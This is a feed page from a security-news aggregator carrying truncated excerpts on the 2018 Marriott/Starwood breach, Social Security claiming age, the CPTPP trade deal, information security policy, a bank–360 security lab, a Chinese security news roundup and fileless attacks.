Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

万豪被黑事件凸显行业亟需推广使用含加密保护的支付技术

$
0
0

北京时间12月3日消息,万豪国际酒店集团(Marriott International hotel group,以下简称“万豪国际”)日前证实,旗下喜达屋酒店预订系统2014年起遭网络“黑客”入侵,泄露了大约5亿客户的个人信息。万豪国际称,“我们已采取措施调查并处理了一起涉及喜达屋客房预订数据库的数据安全事件。调查证实,有人未经授权访问了该数据库,该数据库包含2018年9月10日或之前在喜达屋酒店预订相关的客人信息。”

万豪国际成为最新一家客户 数据库 遭受大规模黑客攻击的公司。该公司表示,虽然信用卡数据是加密的,但黑客也有可能获得加密密钥。

“其中约3.27亿名宾客的信息受到影响,包括姓名、邮寄地址、电话号码、电子邮件地址、护照号码、喜达屋优选宾客(SPG)帐户信息、出生日期、性别、抵达和离开信息、预订日期和通信偏好等等。对于部分客户而言,受到影响的信息还包括:支付卡号和支付卡有效期,但是支付卡号是使用高级加密标准加密(AES-128)加密的。解密支付卡号需要两个组件,目前万豪还无法排除这两个组件都被劫持的可能性。”万豪国际在一份声明中表示。


万豪被黑事件凸显行业亟需推广使用含加密保护的支付技术

与以往报道的大量零售商遭受黑客攻击一样,曝光的信用卡信息会让客户的账户面临欺诈指控。

苹果Apple Pay提供了针对这类黑客攻击行为的保护,因为在使用Apple Pay进行支付时,实际的银行卡信息永远不会提交给公司。用户在使用Apple Pay支付时,无论是 iPhone 在上,还是通过Apple Watch或是Mac,设备会生成一个用来代替卡号的一次性代码。一旦交易完成,代码将永远无法重复使用。

Apple Pay可以在网络上使用,可以在iOS设备上使用,也可以在Mac电脑上使用。使用一台配置了Touch ID的Mac电脑,可以在上面直接使用。至于其他类型的设备,用户可以用iPhone或Apple Watch完成购买。无论哪种方式,它的工作模式都与当面交易相同:只向 网站 提交一个一次性代码。

但目前提供Apple Pay作为支付选择的网站相对较少,因为对于大多数在线购物,无论是购买商品、预订航班还是预订酒店房间,用户大都必须提交银行卡详细信息。越来越多的零售商网站遭到黑客攻击,这意味着我们应该全力推动企业接受Apple Pay,无论是线上还是线下,从而降低风险。


Social Security: Now or Later?

$
0
0

Many financial planners, as well as Kiplinger, recommend waiting until at least your full retirement age--or, even better, until you're 70--to claim Social Security . You're eligible to file for Social Security as early as age 62, but if you do, your benefits will be permanently reduced by at least 25%. Waiting until full retirement age--66 for most baby boomers--means you'll receive 100% of the benefits you've earned. And if you continue to postpone filing for benefits after you reach full retirement age, your payouts will grow by 8% a year until you reach age 70.

SEE ALSO: 10 Things You Must Know About Social Security

That, combined with cost-of-living adjustments in most years, is a return you're unlikely to get anywhere else. Yet retirees seem to be ignoring those numbers: Nearly 60% of retirees claim benefits before age 66, and about one-third of those retirees claim benefits at 62. Are they misguided or onto something?

Figuring out when to file for Social Security usually comes down to a question that's nearly impossible to answer: How long will you live? Retirees who wait until full retirement age or later will receive fewer checks over their lifetime, but the checks will be for larger amounts. The longer you live, the more delaying pays off.

Do the math

The age at which you come out ahead by postponing benefits is known as your break-even age. For example, a 62-year-old top wage earner would come out ahead by filing at 66 as long as he lives past age 77. If he delays filing for benefits until age 70, he would need to live past age 80 to break even. That's below the average life expectancy (84 for men and nearly 87 for women), but if you don't expect to live that long, there's no point in postponing your benefits.

However, if your grandmother celebrated her 100th birthday by playing a few rounds of golf, and you're fit and healthy, you're probably better off waiting until at least full retirement age--or, better yet, age 70--to file your claim.

If you're married--even if your own health or your family history suggests you won't reach your break-even age--there's another factor to consider: survivor benefits. For example, if you're the higher earner and you die first, your spouse will be able to take over your benefits. Delaying benefits will boost the monthly benefit your spouse will receive after you're gone.

Single retirees are usually better off waiting until full retirement age to file for Social Security. But because you don't have to worry about survivor benefits--your benefits will end when you do--you have a less-compelling reason to wait until age 70 to file. Your decision will come down to how badly you need the income and how long you think you'll live.

It's usually not a good idea to claim benefits before full retirement age if you're still working. In 2019, Social Security will temporarily withhold $1 of your benefits for every $2 you earn over $17,640 if you haven't reached full retirement age. If you'll reach the magic number in 2019, it will withhold $1 for every $3 over $46,920 in earnings in the months before you hit full retirement age. After that, you don't have to worry about the earnings test.

Invest your benefits?

Before 2010, retirees who filed for benefits at age 62 and later changed their mind could withdraw their application for benefits, repay the total amount they had received and reapply for a higher benefit based on their age. Now, if you want to withdraw your application for Social Security and repay benefits, you must do it within 12 months after signing up, and you can only do it once. You still have the option of suspending benefits at full retirement age, which will allow you to accrue the 8% delayed retirement credit until age 70.

Even with the payback option eliminated, some retirees remain convinced that they can come out ahead by filing at 62 and investing their benefits. That way, they argue, they won't leave money on the table if they die before their break-even age. This strategy also appeals to retirees who fear that a shortfall in the Social Security trust fund will force the government to cut future benefits.

But in order to beat the guaranteed return you would get by delaying benefits (plus cost-of-living increases), you'd need to invest most of your benefits in stocks, financial planners say. That could work out in your favor--but if the market turns bearish, you won't have years to recover your losses, says Gifford Lehman, a certified financial planner in Monterey, Calif.

Even in the best of times, this game plan requires you to resist the temptation to spend your monthly Social Security check, says Jim Blankenship, a CFP in New Berlin, Ill. "The reality is that many, if not most, folks don't have the discipline to invest the money, and before you know it the projected windfall from filing early has been eaten up by lifestyle creep," he says.

What about worries that Social Security won't be around if you wait? Barring congressional action, the trust fund is slated to run out of money in 2034. It's unlikely, though, that Congress will do nothing over the next 15 years to fix Social Security (see Relax, Your Social Security Benefits Are Safe ). And at that point, payroll taxes would still fund 79% of promised benefits. Any actions Congress takes to shore up the trust fund probably won't affect current retirees.

How to bridge the gap

Some retirees file for Social Security before full retirement age because they're reluctant to tap their retirement plans. Filing for Social Security benefits early may allow you to postpone taking money out of savings, but that strategy may cost you more in the long run.

SEE ALSO: Do You Know the Best Social Security Claiming Strategies?

Here's why: Once you turn 70, you must withdraw required minimum distributions from all of your tax-deferred retirement plans, based on your life expectancy and the balance in those plans at year-end. Leaving those accounts untouched until you turn 70 will increase the size of mandatory withdrawals, along with your tax bill. Depending on your other income, you could find yourself vaulted into a higher tax bracket. Large RMDs could also trigger taxes on up to 85% of your Social Security benefits, plus a surcharge on your Medicare Part B and Part D premiums.

By taking withdrawals from your retirement plans before you hit your seventies, you can reduce the size of those accounts, which will result in smaller taxable RMDs, says Cindi Hill, a certified financial planner with CUNA Mutual Group. You can take money from your tax-deferred accounts with a fairly high degree of confidence that your savings will last 30 years or more--through bear markets and bouts of inflation--if you follow the "4% rule" as a starting point. In your first year of retirement, you withdraw 4% from savings, and you increase the dollar amount of your subsequent annual withdrawals by the previous year's inflation rate (see Make Your Money Las

E-commerce provisions in new trade deal claimed to be good for all

$
0
0

Global software industry advoacte BSA, the software alliance, says the e-commerce provisions in a trade deal struck by 11 countries, including Australia, recently will allow them to take advantage of the digital economy.

Darryn Lim, director, Policy APAC, for BSA, said the Comprehensive and Progressive Agreement for Trans-Pacific Partnership's provisions on cross-border data transfers and data localisation would help create business predictability and legal certainty for regional companies operating in cutting-edge 21st century industries.

He said the BSA favoured free movement of data across borders and no data localisation requirements as the organisation saw inherent benefits in such policies.

The CPTPP was formerly known as the Trans-Pacific Partnership Agreement or TPP. But after US President Donald Trump pulled his country out of the trade deal, the other 11 countries went ahead and completed negotiations. The deal has come into force for some and others will join once their parliaments have ratified it.

Lim was interviewed by email to tease out some details about the new treaty.

iTWire: What is BSA's interest in this treaty based on? Whom does the organisation represent in its lobbying for theComprehensive and Progressive Agreement for Trans-Pacific Partnership (CPTPP)?

Darryn Lim:As the leading industry association representing the global software industry before governments around the world, BSA is most interested in the agreement’s e-commerce chapter, which creates binding multilateral rules that limit restrictions on international data transfers, prohibit requirements for data localisation, and include added protections for source code, among other things.

These are consistent with the elements that BSA views as essential in any modern trade agreement for the 21st century to drive job creation, competitiveness, and innovation, as set out in BSA’s publication “Modernising Digital Trade: An Agenda for Software”. BSA represents companies like Adobe, Amazon Web Services, Apple, Baseplan Software, Cisco, Microsoft, IBM, Salesforce, Symantec, Workday, and numerous others. These companies are at the forefront of innovative data services driving the global economy, such as cloud computing, data analytics, cyber security, blockchain, machine-learning, and artificial intelligence. All of these services depend on the ability to transfer data globally.

Does this treaty leave open the possibility for other countries ― say, like China or India―to join later?

The CPTPP allows new member countries to join the agreement, subject to the ability of each candidate to meet the obligations of the agreement, as well as any other terms and conditions imposed by existing CPTPP members. In any event, existing CPTPP member countries would have to agree to allow any new candidate to join the agreement.

Now that seven countries of the 11 involved have ratified the CPTPP, it has been given effect, has it not?

The CPTPP will go into effect on 30 December for six countries (Australia, Canada, Japan, Mexico, New Zealand and Singapore), and on 14 January 2019 for Vietnam. The trigger for the CPTPP going into effect ― six countries having ratified the agreement ― was met when Australia became the sixth country to ratify it on 31 October. Vietnam ratified the CPTPP on 15 November, hence the slightly later effective date for Vietnam. For the remaining countries (Brunei, Chile, Malaysia, and Peru), the CPTPP will go into effect after they have ratified it.

Why is it so important not to localise data storage? To me, it seems reasonable that a country would want to have data about its citizens' (and other residents) transactions stored within its borders.

For cutting-edge technologies like cloud computing and AI to be available, data needs to be transferred across borders. Data and server localisation requirements limit the availability of these services in the market, which impedes the ability of other local industries to compete, especially in the international market place.

Countries that are looking to have transactional data stored within its borders are often motivated by concerns around security. However, data security ultimately does not depend on the physical location of the data or the location of the infrastructure supporting it. Security is instead a function of the quality and effectiveness of the mechanisms and controls maintained to protect the data in question.

In fact, localising and concentrating data and servers in a country introduces cyber security vulnerabilities by providing a central point of attack for bad actors to target while denying access to the many security benefits that cloud-based technologies can bring, such as redundancy, around-the-clock security monitoring, cloud-based network defence tools, and others.

When it comes to encrypted data, is the BSA's stance any different given its opposition to the encryption bill currently before the Australian Parliament?

BSA’s stance remains the same as set out in the email interview by iTWire on 21 September. We would, however, clarify that, as mentioned in our submission to the Australian Parliament of 12 October and in our testimony during the public hearing on 19 October, we acknowledge and support the Australian Government's desire to have effective tools to aid in the fight against criminal and terrorist activity and to ensure that the rule of law applies equally to offline and online activity.

Our concerns with the Assistance and Access Bill 2018, as presently drafted, lie in its broad scope coupled with inadequate safeguards for the exercise of the authorities granted under the bill.

For instance, India is now insisting that all data regarding monetary transactions be stored physically within its borders. Would that be considered "unreasonable"?

BSA supports balanced policies that protect personal data and further cyber security. Regarding the data localisation measures that India’s financial services regulator (the Reserve Bank of India) have imposed, we focus on whether these requirements are necessary to achieve the RBI’s objectives. We understand these objectives to be two-fold the ability for the RBI to perform its regulatory duties, and the need to ensure data integrity and security. Data localisation does not advance either of these goals.

With respect to the ability to perform regulatory duties, other regulators such as those in Singapore and Hong Kong expressly permit data held by financial services institutions to be stored and processed overseas, clearly demonstrating that the location of the data is not critical to the exercise of regulatory functions. With respect to ensuring data integrity and security, we would reiterate our earlier point that security is a function of the quality and effectiveness of the mechanisms and controls maintained to protect the data in question.

The US had an issue some months ago when it could not gain access to data stored by Microsoft in Ireland; the data was said to be needed to investigate a drugs-related case. Now, that has been overcome by passage of a new law, the CLOUD Act. How would the Comprehensive and Progressive Agreement for Trans-Pacific Partnership affect issues like this?

As far as we are aware, the CPTPP does not directly affect this issue, although the agreement does contain a number of co-operation and dialogue mechanisms at which this issue could be discussed.

Given that at least some of the countries involved in the CPTPP do not have digital systems that can deal effectively with some of the treaty changes, what is the use of putting such changes in place? The e-commerce provisions in the CPTPP will improve the ability of countries to take advantage of the digital economy. Its provisions on cross-border data transfers and data localisation will help create b

The Key Components to an Information Security Policy

$
0
0

Information Security Policy (ISP) is a set of rules enacted by an organization to ensure that all users or networks of the IT structure within the organization’s domain abide by the prescriptions regarding the security of data stored digitally within the boundaries the organization stretches its authority.

An ISP is governing the protection of information, which is one of the many assets a corporation needs to protect. The present writing will discuss some of the most important aspects a person should take into account when contemplates developing an ISP. Putting to work the logical arguments of rationalization, one could say that a policy can be as broad as the creators want it to be: Basically, everything from A to Z in terms of IT security, and even more. For that reason, the emphasis here is placed on a few key elements, but you should make a mental note of the liberty of thought organizations have when they forge their own guidelines.


The Key Components to an Information Security Policy
2 Elements of Information Security Policy 2.1 Purpose

Institutions create ISPs for a variety of reasons:

To establish a general approach to information security To detect and forestall the compromise of information security such as misuse of data, networks, computer systems and applications. To protect the reputation of the company with respect to its ethical and legal responsibilities. To observe the rights of the customers; providing effective mechanisms for responding to complaints and queries concerning real or perceived non-compliances with the policy is one way to achieve this objective.
The Key Components to an Information Security Policy
2.2 Scope

ISP should address all data, programs, systems, facilities, other tech infrastructure, users of technology and third parties in a given organization, without exception.


The Key Components to an Information Security Policy
2.3 Information security objectives

An organization that strive to compose a working ISP needs to have well-defined objectives concerning security and strategy on which management have reached an agreement. Any existing dissonances in this context may render the information security policy project dysfunctional. The most important thing that a security professional should remember is that his knowing the security management practices would allow him to incorporate them into the documents he is entrusted to draft, and that is a guarantee for completeness, quality and workability.

Simplification of policy language is one thing that may smooth away the differences and guarantee consensus among management staff. Consequently, ambiguous expressions are to be avoided. Beware also of the correct meaning of terms or common words. For instance, “musts” express negotiability, whereas “shoulds” denote certain level of discretion. Ideally, the policy should be briefly formulated to the point. Redundancy of the policy’s wording (e.g., pointless repetition in writing) should be avoided as well as it would make documents long-winded and out of sync, with illegibility that encumbers evolution. In the end, tons of details may impede the complete compliance at the policy level.

So how management views IT security seems to be one of the first steps when a person intends to enforce new rules in this department. Furthermore, a security professional should make sure that the ISP has an equal institutional gravity as other policies enacted within the corporation. In cases where an organization has sizeable structure, policies may differ and therefore be segregated in order to define the dealings in the intended subset of this organization.

Information security is deemed to safeguard three main objectives:

Confidentiality data and information assets must be confined to people authorized to access and not be disclosed to others; Integrity keeping the data intact, complete and accurate, and IT systems operational;

Availability an objective indicating that information or system is at disposal of authorized users when needed.

Donn Parker, one of the pioneers in the field of IT security, expanded this threefold paradigm by suggesting also “authenticity” and “utility”.

Diagram 1


The Key Components to an Information Security Policy
2.4 Authority & Access Control Policy

Typically, a security policy has a hierarchical pattern. It means that inferior staff is usually bound not to share the little amount of information they have unless explicitly authorized. Conversely, a senior manager may have enough authority to make a decision what data can be shared and with whom, which means that they are not tied down by the same information security policy terms. So the logic demands that ISP should address every basic position in the organization with specifications that will clarify their authoritative status.


The Key Components to an Information Security Policy

Policy refinement takes place simultaneously with defining the administrative control, or authority in other words, people in the organization have. In essence, it is hierarchy-based delegation of control in which one may have authority over his own work, project manager has authority over project files belonging to a group he is appointed to, and the system administrator has authority solely over system files a structure reminiscent of the separation of powers doctrine. Obviously, a user may have the “need-to-know” for a particular type of information. Therefore, data must have enough granularity attribute in order to allow the appropriate authorized access. This is the thin line of finding the delicate balance between permitting access to those who need to use the data as part of their job and denying such to unauthorized entities.

Access to company’s network and servers, whether or not in the physical sense of the word, should be via unique logins that require authentication in the form of either passwords, biometrics, ID cards, or tokens etc. Monitoring on all systems must be implemented to record logon attempts (both successful ones and failures) and exact date and time of logon and logoff.


The Key Components to an Information Security Policy
The Key Components to an Information Security Policy

Speaking of evolution in the previous point as the IT security program matures, the policy may need updating. While doing so will not necessarily be tantamount to improvement in security, it is nevertheless a sensible recommendation.

2.5 Classification of Data

Data can have different value. Gradations in the value index may impose separation and specific handling regimes/procedures for each kind. An information classification system therefore may succeed to pay attention to protection of data that has significant importance for the organization, and leave out insignificant information that would otherwise overburden organization’s resources. Data classification policy may arrange the entire set of information as follows:

High Risk Class data protected by state and federal legislation (the Data Protection Act, HIPAA, FERPA) as well as financial, payroll, and personnel (privacy requirements) are included here. Confidential Class the data in this class does not enjoy the privilege of being under the wing of law, but the data owner judges that it should be protected against unauthorized disclosure. Class Public This information can be freely distributed. Da

共同探索金融网络安全浦发360网络安全联合实验室揭牌

$
0
0

原标题:共同探索金融网络安全浦发360网络安全联合实验室揭牌

近日,“浦发360网络安全联合实验室”揭牌仪式在上海举行。浦发银行副行长潘卫东和360企业安全集团董事长齐向东共同为实验室揭牌,中国工程院院士柴洪峰出席仪式并见证。本次浦发银行与360企业安全集团联合创立实验室,旨在充分发挥双方优势,共同推进金融安全常态交流、研究、课题工作,实现安全技术在金融领域的创新探索和深度应用,从而为金融客户创建更为安全的服务环境。


共同探索金融网络安全浦发360网络安全联合实验室揭牌

浦发银行副行长潘卫东和360企业安全集团董事长齐向东共同为实验室揭牌


共同探索金融网络安全浦发360网络安全联合实验室揭牌

中国工程院院士柴洪峰出席仪式并致辞

近年来,随着移动互联网、云计算、大数据、区块链等新技术的广泛应用,金融行业信息系统不断深化发展,互联网金融的蓬勃发展也深刻影响了金融机构的经营模式和商业生态环境,金融行业信息安全面临新的问题,网络安全防御体系面临新的挑战。面对信息化建设过程中的网络安全风险,金融行业需要从治理、管理、机制等多方面入手,多管齐下、多措并举,做到“以安全保发展、以发展促安全”。“浦发360网络安全联合实验室”的建立,是浦发银行和360企业安全集团一次成功的跨界合作,也是应对金融业网络安全风险的有力举措。

潘卫东在揭牌仪式致辞中表示,安全有多强,决定了数字生态可以走多远,通过联合共建的网络安全实验室转变安全理念、研究新技术、预判新风险,定会取得金融网络安全领域的丰硕成果,并锻造出一支富有战斗力的顶级安全特战队。


共同探索金融网络安全浦发360网络安全联合实验室揭牌

360企业安全集团董事长齐向东在揭牌仪式上致辞

齐向东表示,金融行业的关键信息基础设施是经济社会运行的神经中枢,是网络安全的重中之重,360企业安全集团很荣幸能和浦发银行共同成立网络安全联合实验室,一起探索安全技术在金融领域的深度应用和创新,共同提升安全态势感知能力、攻防对抗能力和安全技术研发能力,持续助力金融行业数字化转型。

浦发银行和360企业安全集团将通过网络安全联合实验室,充分发挥各自在金融科技和网络安全技术方面的优势,积极开展威胁情报共享、攻防演练等方面的合作。同时,双方还将在金融安全运营的新技术、新理念方面深入研究,积极探索金融业网络安全,为浦发银行建设数字生态银行保驾护航。

(责编:任妍、杨波)

【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金

$
0
0

摘要: 国产勒索病毒爆发 微信扫码支付作为赎金12月1日,不少电脑感染了一款新型勒索病毒,这也是首款要求使用微信扫码支付作为赎金的勒索病毒,目前该病毒已被破解。该勒索病毒感染系统后,会加密txt、office文档等有价值数据(与其他勒索病毒不同的是,没有修改原文件后缀...

国产勒索病毒爆发 微信扫码支付作为赎金
【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金
12月1日,不少电脑感染了一款新型勒索病毒,这也是首款要求使用微信扫码支付作为赎金的勒索病毒,目前该病毒已被破解。该勒索病毒感染系统后,会加密txt、office文档等有价值数据(与其他勒索病毒不同的是,没有修改原文件后缀名),并在桌面释放一个“你的电脑文件已被加密,点此解密”的快捷方式。点击后弹出解密教程和收款二维码,强迫受害用户通过手机转帐缴付解密酬金。该勒索病毒的收款二维码已被列入异常名单。

参考来源:

https://news.mydrivers.com/1/605/605744.htm

360 移动安全与华为终端百万安全奖励计划达成合作
【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金
在2018华为终端安全奖励计划大会上,华为正式对外披露“漏洞奖励计划”,向受邀安全研究者提供最高100万元人民币的漏洞发现奖励和荣誉致谢。其中,360移动安全是其首批合作伙伴。360 C0RE Team负责人周明建表示,在众多内核漏洞中,厂商驱动占比超过90%。周明建所在的360 C0RE Team 在过去的两年一共报告了138个Andriod漏洞,全球占比连续两年均超过12%。华为此次正式对外披露“漏洞奖励计划”,向受邀安全研究者提供最高100万元人民币的漏洞发现奖励和荣誉致谢,此举也将激励更多白帽子投身华为移动终端产品安全性的研究从而不断提升产品安全性。

参考来源:

https://www.cnbeta.com/articles/tech/793945.htm

达美航空启动美国首个生物识别航站楼, “ 刷脸 ” 即可值机登机
【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金
达美航空公司在其北美总部亚特兰大宣布与美国海关和边境保护局(CBP)和美国运输安全管理局(TSA)合作,在亚特兰大哈兹菲尔德-杰克逊国际航站楼(F航站楼)推出生物识别技术,这是美国第一个全面启用生物识别技术的航站楼。在机场出发大厅,从航站楼直至登机口,所有搭乘达美航班的乘客并不需要通过传统方的登机方式一样不停地出示护照,只需对准设备的摄像头,通过生物识别技术即可办理自助值机、行李托运以及过安检和在登机口登机。乘客在出发大厅的自助服务亭屏幕上选择“Look”(看)按钮后,在大厅的值机柜台、美国运输安全部检查点、登机口等处,要靠近摄像头。屏幕绿灯亮起,即可通过。不过,乘客也还是需要在国际旅行期间自始至终携带护照,以备其他环节使用。

参考来源:

https://www.secrss.com/articles/6825

19 岁青年夺取英国 2018 网络安全挑战赛桂冠
【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金
来自约克的19岁青年 Charlie Hosier 拿下本年度网络安全挑战赛冠军。决赛在伦敦举行,42名非职业网络安全好手参与一系列挑战,通过揭露对虚构加密货币交易所的攻击来展现自己的技术。英国网络安全挑战赛是游戏化网络安全技能挑战的一系列国家级竞赛,旨在吸引业余程序员和视频游戏玩家加入网络安全行业。进入半决赛的选手都是闯过一系列在线挑战难关,经受了网络安全技术检验的高手。

参考来源:

https://www.secrss.com/articles/5459

研究发现新的工业间谍活动,旨在利用 AutoCAD 窃取机密文件
【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金
据外媒ZDNet报道,有安全专家在最近发现了一起非常独特的恶意软件分发活动,其目标是那些在设计工作中使用AutoCAD软件的公司。报道称,这起活动是由来自网络安全公司Forcepoint的安全专家发现的,该公司在本周早些时候向ZDNet分享了这一调查结果。从该公司提供的遥测数据来看,这起活动似乎开始于2014年,并一直活跃至今。Forcepoint的安全专家表示,这起活动背后的黑客组织有可能非常复杂。可以确定的是他们主要对工业间谍活动感兴趣,这是因为其主要感染媒介就是AutoCAD。这是一种具有潜在高价值的软件,主要使用群体是工程师和设计师。

参考来源:

https://www.hackeye.net/securityevent/17571.aspx

百度发布含淫秽、色情、赌博等违法广告被罚 60 万
【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金
北京市工商局海淀分局发布今年第2286号行政处罚决定书:北京百度网讯科技有限公司(以下称“百度”)因发布含有淫秽、色情、赌博、迷信、恐怖、暴力内容的广告被处罚款60万。处罚书显示,2017年2月至2017年8月当事人通过百度网盟给北京言美文化传播有限公司发布以下内容广告:“今日您有缘走进此网站,星云大师为您揭秘12生肖改运旺运秘法。为您改善跌宕起伏的运势,摆脱诸事不顺的厄运,化解流年。”、“你的生肖决定了你这辈子是穷苦命还是富贵命!”等。此外当事人还通过百度网盟给黑龙江省伟澳美机械设备有限公司和大庆开发区三春节能技术有限公司发布类似广告。当事人称截至本案立案时,上述三家广告主发布的内容总计点击消费26220.46元。

参考来源:

http://society.people.com.cn/n1/2018/1201/c1008-30436210.html

美国 BuzzFeed 刊文披露猎豹移动旗下 7 款 App 涉嫌广告欺诈
【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金
美国新闻聚合平台 BuzzFeed News 发布了一篇新闻,直指出海企业猎豹移动及其投资的一家企业旗下 App 存在广告欺诈行为。事情大致是移动应用分析与归因平台 Kochaa 监测到,在应用商店 Google Play 合计下载量超过 20 亿次的8 款App,利用用户许可进行广告欺诈导致广告主损失数百万美元。而其中7款应用猎豹移动,剩下的 1 款 App Kika Tech,后者同样是一家中国公司,总部位于硅谷,在 2016 年收到了猎豹移动的大笔投资。对外数据显示,两家公司旗下应用的月活用户超过 7 亿。

参考来源:

https://t.cj.sina.com.cn

关于安全帮

安全帮,是中国电信北京研究院旗下安全团队,致力于成为“SaaS安全服务领导者”。目前拥有“1+4”产品体系:一个SaaS电商(www.anquanbang.vip) 、四个平台(SDS软件定义安全平台、安全能力开放平台、安全大数据平台、安全态势感知平台)。

相关文章 【安全帮】美国国家电网仍持续不断地遭受俄罗斯黑客的网络安全试探攻击 【安全帮】万豪旗下喜达屋酒店数据库遭入侵,5亿顾客信息或泄露 【安全帮】戴尔宣称发现安全漏洞 已重置所有账户密码;新西兰以国家安全为由禁止使用华为设备 【安全帮】优步270万用户信息被黑客盗取,遭英国监管机构重罚38.5万英镑 【安全帮】javascript库的维护人员通过植入后门来窃取比特币资产


【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金

MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...

$
0
0

I have a Yahoo email account, I’ve shopped at Home Depot and Target , my father was in the military and had a security clearance, which included a dossier on his family, archived at the U.S. Office of Personnel Management , I’ve had insurance coverage from Premera Blue Cross and I’ve stayed at the Marriott Marquis in San Francisco.

Related: Uber hack shows DevOps risk

The common demonitor: All of those organizations have now disclosed massive data breaches over a span of the past five years.


MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...
On Friday, Starwood Properties, which merged with Marriott in 2016, disclosed as many as 500 million people who made reservations at their hotels may have had their personal information accessed in a breach that lasted as long as four years.

The Starwood hack appears to come in second in scale only to the 2013 Yahoo breac h, which affected as many as 3 billion accounts, while a subsequent Yahoo breach also hit 500 million accounts.

The breach is rightly attracting attention of regulators in Europe and the United States. Marriott shares fell nearly 6 percent to $114.67 in Friday afternoon trading. Here’s a roundup of reaction from cybersecurity thought leaders:

Gary Roboff, Senior Advisor, the Santa Fe Group:
MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...

Roboff

How could a breach like this continue for four years? If encryption keys were compromised and payment data was in fact exposed, this couldindicate that stolen credentials were released at an exceptionally slow releaserate versus a mass data dumpexfiltration event in order to make it harder for fraud and security teams to identify the kinds of patterns that would normally indicate a point of compromise.

While we don’t fully understand what happened at Starwood and Marriott, basic security hygiene requires extraordinary attention to detail and diligence.In 2014, a JP Morgan Chase hack exposed 76 million households. A single neglected server that was not protected by a dual password scheme was the last line of defense standing between the hacker and the exposed data. If diligence isn’t constant and systematic, the potential for compromise, with all that implies, increases significantly.

Bimal Gandhi,Chief Executive Officer, Uniken :
MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...

Gandhi

Events like this Marriott Starwood breach underscore the sheerfolly of continued reliance on outdated security methods such as usingPII in authentication, given the sheer proliferation of stolen and leaked PII now available on the Dark Web.

Every piece of customer information that a company holds represents a potential point of attack, and each time a partner or agent accesses it, that becomes a potential attack point as well. Hotels, hospitality companies,banks and eCommerce entities are all moving to newer ways to enable customers authenticate themselves across channels, without requiring any PII.

Customer-facing commerce and financial institutions seeking to thwart credential stuffing are increasingly seeking to migrate beyond PII authentication to more advanced methods that do not require the user to know, manufacture or receive and manually enter a verification factor, in order to eliminate the ability for bad actors to guess, phish, credential-stuff, socially engineer, mimic or capture their way into the network.

Satya Gupta,CTO and Co-founder, Virsec:
MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...

Gupta

What’s most disturbing about this attack is the enormous dwell time inside Starwood’s systems. The attackers apparently had unauthorized access since 2014 a massive window of opportunity to explore internal servers, escalate privileges, moves laterally to other systems, and plot a careful exfiltration strategy before being discovered.

All organizations should assume that the next threat is already inside their networks and won’t be caught by conventional perimeter security. We need much more careful scrutiny of what critical applications are actually doing to spot signs of internal corruption. We must reduce dwell time from years to seconds.

Michael Magrath,Director, Global Regulations & Standards, OneSpan:
MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...

Magrath

The vast stores of personally identifiable data on the Dark Web continues to grow at historic rates, and fraudsters have rich resources with which to steal identities or create new, synthetic identities using a combination of real and made-up information, or entirely fictitious information.

For example, the personal data obtained in one breach could be crossed referenced with data obtained from another breach and other widely publicized private sector breaches, and the Marriott breach only makes their task that much easier and more likely to succeed. Having the databases in the same place makes things even easier for the bad guys.

Franklyn Jones, CMO, Cequence :
MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...

Jones

Unfortunately, we can also expect to see a long tail effect from this breach. As this data finds its way to the dark web, these stolen credentials will be acquired by other bad actors. They, in turn, will orchestrate high volume bot attacks to see if the stolen credentials can also provide access to web, mobile, and API application services of other organizations.

John Gunn, CMO, OneSpan:
MY TAKE: Massive Marriott breach continues seemingly endless run of successful h ...

Gunn

The significance of the Marriott breach is not in the number of records that were compromised, that is relatively small. It’s impact on the victims is much greater than the numbers reveal. It is remarkably easy to request a replacement credit card from your financial institution and you are not responsible for fraudulent activities try that with your passport.

This may be an emerging trend with hacking organizations, to target large pools of passport data. S

FIT 2019议题前瞻:来去无踪,似新非新的“无文件攻击”丨白帽Live

$
0
0

无文件攻击,也被称作非恶意软件攻击。这类攻击的特点在于,利用受害者使用的受信任软件或系统工具来躲避检测,具有相当高的成功率和威胁性。比起基于恶意软件的传统威胁,这种攻击更容易实施也更有效,因此,无文件攻击一经出现便成为安全领域重点关注的问题。

在企业安全的意识理念中,有一条基本的准则:如果不能100%确认安全,就绝不能打开任何文件或附件。否则,下载或打开的内容可能将整个企业陷入危险之中。

对于网络攻击者来说,尽可能的降低攻击成本以及隐蔽自身元素减少被发现的几率,寻找阻力最小的途径发动攻击,自然是实行犯罪的首选。随着科技的发展,大数据时代的来临,企业越来越多的依赖移动设备和云服务等新兴技术来开展工作,与之对应的是网络犯罪分子也在不断根据防护技术更新自身的进攻技巧,无文件攻击便是这个背景下的产物。随着攻击者对该攻击手法的使用越来越得心应手,无文件攻击对企业安全的威胁也空前的大。

传统渗透测试(PT)往往只能代表单个或数个应用系统的安全性,但无法代表整个环境的安全性,红队评估(Redteaming)则会在确保业务环境正常运作的前提下,利用包括无文件攻击、社会工程学、物理入侵、0day漏洞打击等等一切可用的方法,模拟国家战略级黑客部队的手法来实现最终入侵,而不是单纯针对应用系统的渗透测试。

“无文件攻击”这个名词伴随“APT攻击”的慢慢火热而进入了人们的视野,其实“无文件攻击”早在20世纪以前就已经出现过了,只是2001年的“红色代码”事件才把“无文件攻击”这个名词带到公众的面前,2001年距离现在已经是17年了,但这个名词在以前并没有受到广泛的关注。随着APT攻击的出现,安全厂商面临了前所未有的挑战,APT攻击的特点是不易被安全检测引擎所发现,当中的功劳很大程度都是归“无文件攻击”所有,因为“无文件攻击”无需落地到目标的磁盘,因此反病毒引擎一般很难检测到,即使通过检测内存来试图追踪内存中的“无文件攻击”,但往往只能采用白名单等笨方法,但攻击者利用内存滞留技术往往能把杀毒软件耍得团团转。

